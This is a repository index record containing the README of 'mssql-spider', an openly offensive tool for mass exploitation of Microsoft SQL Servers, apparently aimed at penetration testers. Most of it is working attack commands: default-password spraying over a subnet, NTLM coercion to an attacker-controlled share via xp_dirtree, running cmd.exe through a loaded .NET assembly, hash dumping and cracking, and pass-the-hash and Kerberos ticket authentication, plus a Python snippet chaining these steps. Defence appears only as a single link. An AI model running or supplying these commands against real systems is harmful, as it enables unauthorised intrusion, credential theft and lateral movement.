{"id":15002612,"url":"https://github.com/dadevel/mssql-spider","last_synced_at":"2025-04-06T04:11:31.635Z","repository":{"id":133485498,"uuid":"599256577","full_name":"dadevel/mssql-spider","owner":"dadevel","description":"Automated exploitation of MSSQL servers at scale","archived":false,"fork":false,"pushed_at":"2025-03-29T08:27:31.000Z","size":436,"stargazers_count":107,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-30T03:05:52.263Z","etag":null,"topics":["adsecurity","mssql","offsec"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dadevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-02-08T19:16:14.000Z","updated_at":"2025-03-29T08:27:29.000Z","dependencies_parsed_at":"2023-11-16T07:32:12.836Z","dependency_job_id":"6b4adace-7d4e-4331-8db6-c73cf524ef29","html_url":"https://github.com/dadevel/mssql-spider","commit_stats":{"total_commits":63,"total_committers":3,"mean_commits":21.0,"dds":0.4285714285714286,"last_synced_commit":"65c50088fc469f82a70cbbb757a0a52caffcba8d"},"previous_names":[],"tags_count":16,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dadevel","download_url":"https://codeload.github.com/dadevel/mssql-spider/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247430871,"owners_count":20937874,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["adsecurity","mssql","offsec"],"created_at":"2024-09-24T18:51:30.954Z","updated_at":"2025-04-06T04:11:31.614Z","avatar_url":"https://github.com/dadevel.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# mssql-spider\n\n![Screenshot](./assets/demo.png)\n\nAn improved [impacket-mssqclient](https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py) that discovers and exploits as many Microsoft SQL Servers as it can reach by crawling linked instances and abusing user impersonation.\nFor example, it can solve the [OSEP](https://www.offensive-security.com/pen300-osep/) Lab Challenge 2 automatically.\n\nBig thanks to the developers of fortra/impacket#1397, [SQLRecon](https://github.com/xforcered/SQLRecon) and [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) on which this project is based.\n\n# Setup\n\na) With [pipx](https://github.com/pypa/pipx).\n\n~~~ bash\npipx install git+https://github.com/dadevel/mssql-spider.git@main\n~~~\n\nb) With [pip](https://github.com/pypa/pip).\n\n~~~ bash\npip install --user git+https://github.com/dadevel/mssql-spider.git@main\n~~~\n\nIf you want the latest features replace `@main` with `@dev`.\n\n# Usage\n\nStarting from just network access without credentials (classic network pentest), spray known default passwords, abuse user impersonation or linked instances to reach additional servers and execute `whoami` on all servers where you gained *sysadmin* access:\n\n~~~ bash\nmapcidr -cidr 192.168.178.0/24 | mssql-ping | tee ./instances.json | mssql-spray passwords -c ./assets/default-credentials.txt | tee ./logins.json | mssql-spider -x 'whoami /all'\n~~~\n\nStarting with domain credentials, fetch SPNs of MSSQL servers from BloodHounds database and coerce NTLM authentication from all reachable servers with `xp_dirtree`.\nThis does not require privileged access.\n\n~~~ bash\nmssql-discover bloodhound | mssql-ping | tee ./instances.json | mssql-spider -d corp.local -u jdoe -p 'passw0rd' --sysinfo -c '\\\\192.168.178.128\\harvest'\n~~~\n\nAll commands switch to JSON input or output if they are used as part of a pipeline.\nYou can override this behavior with `--no-json-input` / `--no-json-output`.\n\n## Advanced Features\n\nLoad and execute a .NET assembly as *sysadmin*.\nThe first argument is the path to the DLL.\nThe second argument is the name of the function to call.\nAll following arguments are passed to the function as `SqlString`.\nThe C# code for an exemplary DLL can be found at [SharpProcedure.cs](./extras/SharpProcedure.cs).\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local --exec-clr ./SharpProcedure.dll Run cmd.exe '/c echo %USERNAME%'\n~~~\n\nDump secrets and crack password hashes of database logins with [hashcat](https://github.com/hashcat/hashcat).\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local --dump-hashes ./hashes.txt --dump-jobs --dump-autologon\nhashcat -O -w 3 -a 0 -m 1731 --username ./hashes.txt ./rockyou.txt\n~~~\n\nPost-process the JSON output with `jq`.\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local -x 'whoami /priv' | jq -r 'select(.pwned==true and .result!=null)'\n~~~\n\n## Authentication\n\nAs local database user.\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local\n~~~\n\nAs local windows user.\n\n~~~ bash\nmssql-spider -w -u administrator -p 'passw0rd' -t db01.corp.local\n~~~\n\nAs domain user via NTLM and a password.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -p 'passw0rd' -t db01.corp.local\n~~~\n\nAs domain user via NTLM *Pass the Hash*.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -H b9f917853e3dbf6e6831ecce60725930 -t db01.corp.local\n~~~\n\nAs domain user via Kerberos *Overpass the Key*.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -H b9f917853e3dbf6e6831ecce60725930 -k -t db01.corp.local\n~~~\n\nAs domain user via Kerberos *Pass the Key*.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -a c4c283276339e2d6b390eb5a11d419c9 -k -t db01.corp.local\n~~~\n\nAs domain user via Kerberos *Pass the Ticket*.\n\n~~~ bash\nexport KRB5CCNAME=./jdoe.ccache\nmssql-spider -k -t db01.corp.local\n~~~\n\n# Library Usage\n\n~~~ python\nfrom mssqlmap.client import Client\nfrom mssqlmap.connection import Connection\nfrom mssqlmap.modules.dump import HashDumper\nfrom mssqlmap.modules.exec import CmdShellExecutor\nfrom mssqlmap.modules.impersonated_user import ImpersonationSpider\nfrom mssqlmap.modules.linked_instance import LinkSpider\n\nwith Client(Connection(host='db01.corp.local', username='sa', password='passw0rd')) as client:\n    for child, module, status in client.spider([ImpersonationSpider(), LinkSpider()]):\n        print(child, module, status)\n        if status in ('failed', 'denied', 'repeated'):\n            continue\n        for module, result in child.invoke([CmdShellExecutor('whoami /all'), HashDumper('./hashes.txt')]):\n            print(child, module, result)\n~~~\n\n# Prevention and Detection\n\nSee [github.com/skahwah/sqlrecon/wiki](https://github.com/xforcered/SQLRecon/wiki/8.-Prevention,-Detection-and-Mitigation-Guidance).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fmssql-spider","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdadevel%2Fmssql-spider","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fmssql-spider/lists"}